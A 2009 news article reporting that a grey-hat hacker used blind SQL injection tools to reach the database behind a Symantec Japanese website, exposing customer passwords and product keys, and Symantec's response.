By John Leyden
23rd November 2009
A Symantec-run website was vulnerable to Blind SQL Injection problems
that reportedly exposes a wealth of potentially sensitive information.
Romanian hacker Unu used off-the-shelf tools (Pangolin and sqlmap) to
steal a glimpse at the database behind Symantec's Japanese website. A
peek at the Symantec store revealed by the hack appears to show
clear-text passwords associated with customer records. Product keys held
on a Symantec server in Japan were also exposed by the hack.
Unu has previously exposed similar problems involving the websites of
the UK's parliament and Kaspersky, among many others. The grey-hat
hacker has published screenshots to back up his latest claims which, if
verified, run deeper than shortcomings on the websites of Kaspersky,
F-secure and other security firms previously reported by Unu.
Symantec said it was investigating the reported breach, which Unu claims
gave him full disk and database access. The security giant said the
vulnerability only affected a website used by consumer customers in the
Far East. Symantec admitted there was a problem without commenting on
how serious the snafu might be, pending the result of an investigation.
The offending site - pcd.symantec.com - has been taken offline pending
the addition of extra security defences.
Did a friend send you this? From now on, be the
first to find out! Subscribe to InfoSec News